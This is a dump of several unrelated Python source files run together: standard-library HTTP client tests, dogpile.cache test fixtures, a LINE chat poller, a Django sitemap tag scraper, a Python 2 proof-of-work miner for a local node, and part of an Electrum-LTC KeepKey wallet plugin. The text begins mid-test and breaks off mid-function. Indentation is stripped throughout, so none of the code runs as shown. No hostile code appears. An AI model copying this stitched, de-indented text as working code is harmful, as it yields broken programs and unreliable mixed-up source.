self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
_fixtures.py
import collections
import itertools
import json
import random
from threading import Lock
from threading import Thread
import time
from unittest import TestCase
import pytest
from dogpile.cache import CacheRegion
from dogpile.cache import register_backend
from dogpile.cache.api import CacheBackend
from dogpile.cache.api import CacheMutex
from dogpile.cache.api import NO_VALUE
from dogpile.cache.region import _backend_loader
from . import assert_raises_message
from . import eq_
class _GenericBackendFixture(object):
@classmethod
def setup_class(cls):
backend_cls = _backend_loader.load(cls.backend)
try:
arguments = cls.config_args.get("arguments", {})
backend = backend_cls(arguments)
except ImportError:
pytest.skip("Backend %s not installed" % cls.backend)
cls._check_backend_available(backend)
def tearDown(self):
if self._region_inst:
for key in self._keys:
self._region_inst.delete(key)
self._keys.clear()
elif self._backend_inst:
self._backend_inst.delete("some_key")
@classmethod
def _check_backend_available(cls, backend):
pass
region_args = {}
config_args = {}
extra_arguments = {}
_region_inst = None
_backend_inst = None
_keys = set()
def _region(self, backend=None, region_args={}, config_args={}):
_region_args = {}
# TODO: maybe we use a class-level naming convention instead
# of a dict here so that arguments merge naturally
for cls in reversed(self.__class__.__mro__):
if "region_args" in cls.__dict__:
_region_args.update(cls.__dict__["region_args"])
_region_args.update(**region_args)
_config_args = self.config_args.copy()
_config_args.update(config_args)
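# Record every key that passes through the key mangler so that
# tearDown() can delete them from the backend afterwards.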
def _store_keys(key):
if existing_key_mangler:
key = existing_key_mangler(key)
self._keys.add(key)
return key
self._region_inst = reg = CacheRegion(**_region_args)
existing_key_mangler = self._region_inst.key_mangler
self._region_inst.key_mangler = _store_keys
self._region_inst._user_defined_key_mangler = _store_keys
reg.configure(backend or self.backend, **_config_args)
return reg
def _backend(self):
backend_cls = _backend_loader.load(self.backend)
_config_args = self.config_args.copy()
arguments = _config_args.get("arguments", {})
arguments = {**arguments, **self.extra_arguments}
self._backend_inst = backend_cls(arguments)
return self._backend_inst
class _GenericBackendTest(_GenericBackendFixture, TestCase):
def test_backend_get_nothing(self):
backend = self._backend()
eq_(backend.get_serialized("some_key"), NO_VALUE)
def test_backend_delete_nothing(self):
backend = self._backend()
backend.delete("some_key")
def test_backend_set_get_value(self):
backend = self._backend()
backend.set_serialized("some_key", b"some value")
eq_(backend.get_serialized("some_key"), b"some value")
def test_backend_delete(self):
backend = self._backend()
backend.set_serialized("some_key", b"some value")
backend.delete("some_key")
eq_(backend.get_serialized("some_key"), NO_VALUE)
def test_region_set_get_value(self):
reg = self._region()
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_region_set_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
eq_(values["key1"], reg.get("key1"))
eq_(values["key2"], reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
def test_region_get_zero_multiple_values(self):
reg = self._region()
eq_(reg.get_multi([]), [])
def test_region_set_zero_multiple_values(self):
reg = self._region()
reg.set_multi({})
def test_region_set_zero_multiple_values_w_decorator(self):
reg = self._region()
values = reg.get_or_create_multi([], lambda: 0)
eq_(values, [])
def test_region_get_or_create_multi_w_should_cache_none(self):
reg = self._region()
values = reg.get_or_create_multi(
["key1", "key2", "key3"],
lambda *k: [None, None, None],
should_cache_fn=lambda v: v is not None,
)
eq_(values, [None, None, None])
def test_region_get_multiple_values(self):
reg = self._region()
key1 = "value1"
key2 = "value2"
key3 = "value3"
reg.set("key1", key1)
reg.set("key2", key2)
reg.set("key3", key3)
values = reg.get_multi(["key1", "key2", "key3"])
eq_([key1, key2, key3], values)
def test_region_get_nothing_multiple(self):
reg = self._region()
reg.delete_multi(["key1", "key2", "key3", "key4", "key5"])
values = {"key1": "value1", "key3": "value3", "key5": "value5"}
reg.set_multi(values)
reg_values = reg.get_multi(
["key1", "key2", "key3", "key4", "key5", "key6"]
)
eq_(
reg_values,
["value1", NO_VALUE, "value3", NO_VALUE, "value5", NO_VALUE],
)
def test_region_get_empty_multiple(self):
reg = self._region()
reg_values = reg.get_multi([])
eq_(reg_values, [])
def test_region_delete_multiple(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
reg.delete_multi(["key2", "key10"])
eq_(values["key1"], reg.get("key1"))
eq_(NO_VALUE, reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
eq_(NO_VALUE, reg.get("key10"))
def test_region_set_get_nothing(self):
reg = self._region()
reg.delete_multi(["some key"])
eq_(reg.get("some key"), NO_VALUE)
def test_region_creator(self):
reg = self._region()
def creator():
return "some value"
eq_(reg.get_or_create("some key", creator), "some value")
@pytest.mark.time_intensive
def test_threaded_dogpile(self):
# run a basic dogpile concurrency test.
# note the concurrency of dogpile itself
# is intensively tested as part of dogpile.
reg = self._region(config_args={"expiration_time": 0.25})
lock = Lock()
canary = []
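# creator() acquires the lock non-blocking; if the dogpile lock is doing
# its job, only one creator runs at a time and every acquire succeeds
# (checked below, unless the backend uses a lock timeout).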
def creator():
ack = lock.acquire(False)
canary.append(ack)
time.sleep(0.25)
if ack:
lock.release()
return "some value"
def f():
for x in range(5):
reg.get_or_create("some key", creator)
time.sleep(0.5)
threads = [Thread(target=f) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
assert len(canary) > 2
if not reg.backend.has_lock_timeout():
assert False not in canary
@pytest.mark.time_intensive
def test_threaded_get_multi(self):
reg = self._region(config_args={"expiration_time": 0.25})
locks = dict((str(i), Lock()) for i in range(11))
canary = collections.defaultdict(list)
def creator(*keys):
assert keys
ack = [locks[key].acquire(False) for key in keys]
# print(
# ("%s " % thread.get_ident()) + \
# ", ".join(sorted("%s=%s" % (key, acq)
# for acq, key in zip(ack, keys)))
# )
for acq, key in zip(ack, keys):
canary[key].append(acq)
time.sleep(0.5)
for acq, key in zip(ack, keys):
if acq:
locks[key].release()
return ["some value %s" % k for k in keys]
def f():
for x in range(5):
reg.get_or_create_multi(
[
str(random.randint(1, 10))
for i in range(random.randint(1, 5))
],
creator,
)
time.sleep(0.5)
f()
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert sum([len(v) for v in canary.values()]) > 10
for acks in canary.values():
assert False not in acks
def test_region_delete(self):
reg = self._region()
reg.set("some key", "some value")
reg.delete("some key")
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
@pytest.mark.time_intensive
def test_region_expire(self):
# TODO: ideally tests like these would not be using actual
# time(); instead, an artificial function where the increment
# can be controlled would be preferred. this way tests need not
# have any delay in running and additionally there is no issue
# with very slow processing missing a timeout, as is often the
# case with this particular test
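# (illustrative sketch, not implemented here: a controllable clock such as
#      fake_now = [0.0]
#  advanced explicitly via "fake_now[0] += 1.0" and substituted for
#  time.time() with unittest.mock.patch would let these assertions run
#  without real sleeps; how practical that is depends on where the backend
#  reads the clock)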
reg = self._region(config_args={"expiration_time": 0.75})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(0.85)
# expiration is definitely hit
eq_(reg.get("some key", ignore_expiration=True), "some value 1")
eq_(reg.get_or_create("some key", creator), "some value 2")
# this line needs to run less than .75 sec after the previous
# two calls or it hits the expiration
eq_(reg.get("some key"), "some value 2")
def test_decorated_fn_functionality(self):
# test for any quirks in the fn decoration that interact
# with the backend.
reg = self._region()
counter = itertools.count(1)
@reg.cache_on_arguments()
def my_function(x, y):
return next(counter) + x + y
# Start with a clean slate
my_function.invalidate(3, 4)
my_function.invalidate(5, 6)
my_function.invalidate(4, 3)
eq_(my_function(3, 4), 8)
eq_(my_function(5, 6), 13)
eq_(my_function(3, 4), 8)
eq_(my_function(4, 3), 10)
my_function.invalidate(4, 3)
eq_(my_function(4, 3), 11)
def test_exploding_value_fn(self):
reg = self._region()
def boom():
raise Exception("boom")
assert_raises_message(
Exception, "boom", reg.get_or_create, "some_key", boom
)
class _GenericSerializerTest(TestCase):
# Inheriting from this class will make test cases
# use these serialization arguments
region_args = {
"serializer": lambda v: json.dumps(v).encode("ascii"),
"deserializer": json.loads,
}
def test_uses_serializer(self):
region = self._region()
backend = region.backend
value = {"foo": ["bar", 1, False, None]}
region.set("k", value)
raw = backend.get_serialized("k")
assert isinstance(raw, bytes)
pipe = raw.find(b"|")
payload = raw[pipe + 1 :]
eq_(payload, self.region_args["serializer"](value))
eq_(region._parse_serialized_from_backend(raw).payload, value)
def test_uses_deserializer(self):
region = self._region()
value = {"foo": ["bar", 1, False, None]}
region.set("k", value)
asserted = region.get("k")
eq_(asserted, value)
# TODO: test set_multi, get_multi
class _GenericMutexTest(_GenericBackendFixture, TestCase):
def test_mutex(self):
backend = self._backend()
mutex = backend.get_mutex("foo")
ac = mutex.acquire()
assert ac
ac2 = mutex.acquire(False)
assert not ac2
mutex.release()
ac3 = mutex.acquire()
assert ac3
mutex.release()
def test_subclass_match(self):
backend = self._backend()
mutex = backend.get_mutex("foo")
assert isinstance(mutex, CacheMutex)
@pytest.mark.time_intensive
def test_mutex_threaded(self):
backend = self._backend()
backend.get_mutex("foo")
lock = Lock()
canary = []
def f():
for x in range(5):
mutex = backend.get_mutex("foo")
mutex.acquire()
for y in range(5):
ack = lock.acquire(False)
canary.append(ack)
time.sleep(0.002)
if ack:
lock.release()
mutex.release()
time.sleep(0.02)
threads = [Thread(target=f) for i in range(5)]
for t in threads:
t.start()
for t in threads:
t.join()
assert False not in canary
def test_mutex_reentrant_across_keys(self):
backend = self._backend()
for x in range(3):
m1 = backend.get_mutex("foo")
m2 = backend.get_mutex("bar")
try:
m1.acquire()
assert m2.acquire(False)
assert not m2.acquire(False)
m2.release()
assert m2.acquire(False)
assert not m2.acquire(False)
m2.release()
finally:
m1.release()
def test_reentrant_dogpile(self):
reg = self._region()
def create_foo():
return "foo" + reg.get_or_create("bar", create_bar)
def create_bar():
return "bar"
eq_(reg.get_or_create("foo", create_foo), "foobar")
eq_(reg.get_or_create("foo", create_foo), "foobar")
class MockMutex(object):
def __init__(self, key):
self.key = key
def acquire(self, blocking=True):
return True
def release(self):
return
class MockBackend(CacheBackend):
def __init__(self, arguments):
self.arguments = arguments
self._cache = {}
def get_mutex(self, key):
return MockMutex(key)
def get(self, key):
try:
return self._cache[key]
except KeyError:
return NO_VALUE
def get_multi(self, keys):
return [self.get(key) for key in keys]
def set(self, key, value):
self._cache[key] = value
def set_multi(self, mapping):
for key, value in mapping.items():
self.set(key, value)
def delete(self, key):
self._cache.pop(key, None)
def delete_multi(self, keys):
for key in keys:
self.delete(key)
register_backend("mock", __name__, "MockBackend")
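# Illustrative sketch (not executed by the test suite): once MockBackend is
# registered under the name "mock", a region can be configured against it
# like any other dogpile.cache backend, e.g.:
#
#     from dogpile.cache import make_region
#     demo_region = make_region().configure("mock")
#     demo_region.set("demo_key", "demo value")
#     assert demo_region.get("demo_key") == "demo value"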
|
oepoll.py
|
# -*- coding: utf-8 -*-
from .client import LINE
import threading
class OEPoll(object):
OpInterrupt = {}
client = None
__squareSubId = {}
__squareSyncToken = {}
def __init__(self, client):
if not isinstance(client, LINE):
raise Exception('You need to pass a LINE instance to initialize OEPoll')
self.client = client
def __fetchOperation(self, revision, count=1):
return self.client.poll.fetchOperations(revision, count)
def __execute(self, op, use_threading):
try:
if use_threading:
_td = threading.Thread(target=self.OpInterrupt[op.type], args=(op,))
_td.daemon = False
_td.start()
else:
self.OpInterrupt[op.type](op)
except Exception as e:
self.client.log(e)
def addOpInterruptWithDict(self, OpInterruptDict):
self.OpInterrupt.update(OpInterruptDict)
def addOpInterrupt(self, OperationType, DisposeFunc):
self.OpInterrupt[OperationType] = DisposeFunc
def setRevision(self, revision):
self.client.revision = max(revision, self.client.revision)
def singleTrace(self, count=1):
try:
operations = self.__fetchOperation(self.client.revision, count=count)
except KeyboardInterrupt:
exit()
except Exception:
return []
if operations is None:
return []
else:
return operations
def trace(self, threading=False):
try:
operations = self.__fetchOperation(self.client.revision)
except KeyboardInterrupt:
exit()
except Exception:
return
if not operations:
return
for op in operations:
if op.type in self.OpInterrupt.keys():
self.__execute(op, threading)
self.setRevision(op.revision)
def singleFetchSquareChat(self, squareChatMid, limit=1):
if squareChatMid not in self.__squareSubId:
self.__squareSubId[squareChatMid] = 0
if squareChatMid not in self.__squareSyncToken:
self.__squareSyncToken[squareChatMid] = ''
sqcEvents = self.client.fetchSquareChatEvents(squareChatMid, subscriptionId=self.__squareSubId[squareChatMid], syncToken=self.__squareSyncToken[squareChatMid], limit=limit, direction=1)
self.__squareSubId[squareChatMid] = sqcEvents.subscription
self.__squareSyncToken[squareChatMid] = sqcEvents.syncToken
return sqcEvents.events
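# Illustrative usage sketch (the LINE constructor arguments and the OpType
# enum are assumptions and depend on the client library in use):
#
#     client = LINE(...)  # authenticate however your deployment requires
#     poller = OEPoll(client)
#     poller.addOpInterrupt(OpType.RECEIVE_MESSAGE,
#                           lambda op: print(op.message.text))
#     while True:
#         poller.trace(threading=True)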
|
get_tags.py
|
from threading import Thread
from requests_html import HTMLSession
from django.core.management.base import BaseCommand
from django.utils.text import slugify
from catalog.models import Tag
def crawler(url):
with HTMLSession() as session:
response = session.get(url)
tag_urls = response.html.xpath('//url/loc')
for tag_url in tag_urls:
name = tag_url.text.split('/')[-2]
tag = {'name': name}
print('tag:', tag)
Tag.objects.create(**tag)
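# Note (illustrative): Tag.objects.create() will raise an IntegrityError on
# re-runs if Tag.name is declared unique; a tolerant variant would be
#     Tag.objects.get_or_create(name=name)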
class Command(BaseCommand):
help = 'Tag Scraper'
def handle(self, *args, **options):
url = 'https://freeessays.page/post_tag-sitemap.xml/'
thread = Thread(target=crawler, args=(url,))
thread.start()
thread.join()
print('Done!')
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2009-2015 Bitcoin Developers
# Copyright (c) 2014-2015 MonetaryUnit Developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class MonetaryUnitRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = MonetaryUnitRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_ltc.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_ltc.bip32 import BIP32Node
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_ltc.keystore import Hardware_KeyStore
from electrum_ltc.plugin import Device, runs_in_hwd_thread
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
